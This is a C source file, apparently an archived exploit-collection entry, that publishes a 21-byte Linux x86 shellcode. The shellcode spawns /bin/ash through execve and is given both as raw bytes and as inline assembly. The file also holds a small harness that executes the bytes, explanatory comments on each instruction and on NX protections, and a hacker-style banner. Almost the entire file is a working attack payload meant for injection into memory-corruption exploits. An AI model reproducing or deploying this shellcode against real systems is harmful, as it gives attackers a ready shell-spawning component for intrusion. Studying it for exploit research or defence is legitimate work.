21 byte execve("/bin/ash",0,0); shellcode for the Linux x86 architecture.
4f10a4f74dae1b5899ad95a596246c4e3188c818647cd9764035b95d4b2b1a8d
/*
* Fri Aug 29 16:29:38 CEST 2003
*
* 21 byte execve("/bin/ash",0,0); shellcode for linux x86
* by zasta (zasta@darkircop.org)
*
* makes no assumptions about register state, so it should work under all circumstances
* bash has problems with null argv so we use ash
*
* can be made shorter by cp /bin/ash ./a and fixing the push
* well there are tons of ways to make shorter shellcodes
* for example having /bin/ash\0 somewhere in memory and just "hardcoding"
* the addr in ebx but this is just a generic example of a versatile
* short shellcode
*
*
* greetz: sorbo, #darkircop@irc.darkircop.org
* daphiel & m00kie (hope your honeymoon was allright... male kids!!!)
* hello to s0lar!!
*
*
* have fun!
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
/*
 * Assembled bytes of code() below -- 21 bytes, none of them 0x00, so the
 * array literal's implicit terminator is the only NUL and strlen() in
 * banner() reports the true length.  Byte -> instruction:
 *   31 c9            xor  %ecx,%ecx
 *   f7 e1            mul  %ecx
 *   04 0b            addb $0xb,%al
 *   52               push %edx
 *   68 2f 61 73 68   push $0x6873612f   ("/ash", little-endian)
 *   68 2f 62 69 6e   push $0x6e69622f   ("/bin", little-endian)
 *   89 e3            mov  %esp,%ebx
 *   cd 80            int  $0x80
 * This is an ordinary writable data object; executing it from main()
 * requires the data segment to be executable, which NX/W^X enforcement
 * on current systems denies (the indirect call then faults).
 */
char shellcode[] =
"\x31\xc9\xf7\xe1\x04\x0b\x52\x68"
"\x2f\x61\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\xcd\x80";
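/*
 * Source form of shellcode[]: execve("/bin/ash", NULL, NULL) through the
 * i386 int $0x80 ABI (eax = 11).  32-bit x86 only: 32-bit push operands
 * are not encodable in 64-bit mode and int $0x80 is the i386 entry.
 *
 *   xor  %ecx,%ecx      ecx = 0                 -> argv = NULL
 *   mul  %ecx           edx:eax = eax * 0       -> eax = edx = 0, whatever
 *                                                  eax held before (this is
 *                                                  the "no assumptions" part)
 *   addb $0xb,%al       eax = 11                -> execve
 *   push %edx           NUL terminator of the path string
 *   push $0x6873612f    "/ash"  \ "/bin/ash\0" built on the stack,
 *   push $0x6e69622f    "/bin"  / little-endian
 *   mov  %esp,%ebx      ebx -> path
 *   int  $0x80          edx is still 0         -> envp = NULL
 *
 * The original spelled the asm as a single string literal spanning
 * several lines, which current GCC rejects; adjacent literals joined
 * with explicit "\n\t" are the portable spelling of the same text.
 * The asm declares no outputs or clobbers and leaves 12 bytes pushed:
 * that is only sound because a successful execve() never returns.
 */
void code(void) {
    __asm__(
        "xor %ecx,%ecx\n\t"
        "mul %ecx\n\t"
        "addb $0xb,%al\n\t"
        "push %edx\n\t"
        "push $0x6873612f\n\t"
        "push $0x6e69622f\n\t"
        "mov %esp,%ebx\n\t"
        "int $0x80\n\t"
    );
}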
/* lets l00k l33t w00t */
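/*
 * Prints the banner followed by the payload length.
 *
 * strlen() is a valid length here only because no byte of shellcode[]
 * is 0x00, so the array's implicit terminator is the first NUL.  The
 * size_t result is cast to int to match the "%d" conversion; the
 * original passed size_t straight to "%d", which is a format/argument
 * mismatch on platforms where the two differ in width.
 */
void banner(void) {
    printf("execve(\"/bin/ash\",0,0); shellcode %d bytes (short enough? ;)\n"
           "============================================================\n\n"
           " by\n"
           " _\n"
           " ______ _ ___| |_ __ _\n"
           " |_ / _` / __| __/ _` |\n"
           " / / (_| \\__ \\ || (_| |\n"
           " /___\\__,_|___/\\__\\__,_|\n"
           "\t\tzasta@darkricop.org\n\n"
           " the first italian hackgirl\n"
           " ph34r I own even acidburn\n\n\n",
           (int) strlen(shellcode));
}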
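/*
 * Entry point.  Parses the command line and runs either the inline-asm
 * form of the payload (-a) or the byte-array form (-s, also the default
 * when no option is given).  -h prints usage; any unknown option is
 * handled exactly like -h.
 *
 * Executing the byte array requires the data segment to be executable;
 * where NX/W^X is enforced the indirect call faults (SIGSEGV) instead
 * of running the bytes.  Converting an object pointer to a function
 * pointer is not defined by ISO C -- the harness relies on the usual
 * GCC/ELF behaviour.
 *
 * Never returns normally: every path ends in exit(0), including the
 * ones reached only if the payload's execve() failed.
 */
int main(int argc, char *argv[]) {
    int opt;
    /* The byte array viewed as code; this is what -s and the
     * no-option default invoke. */
    void (*ptr)(void) = (void (*)(void)) &shellcode[0];

    /* getopt() reports the end of the options as -1, not EOF
     * (the original compared against EOF, which is only -1 by
     * convention). */
    while ((opt = getopt(argc, argv, "ahs")) != -1) {
        switch (opt) {
        default:  /* unknown option: fall through to the usage text */
        case 'h':
            printf("Usage: %s <opts>\n"
                   "-h\tThis lame message\n"
                   "-a\tLaunch asm code\n"
                   "-s\tLaunch hex code\n", argv[0]);
            exit(0);
        case 'a':
            banner();
            code();
            exit(0); /* unreach if all goes well */
        case 's':
            banner();
            (*ptr)();
            exit(0); /* ditto */
        }
    }
    /* default just launch our hex code */
    banner();
    (*ptr)();
    exit(0); /* guess the comment */
}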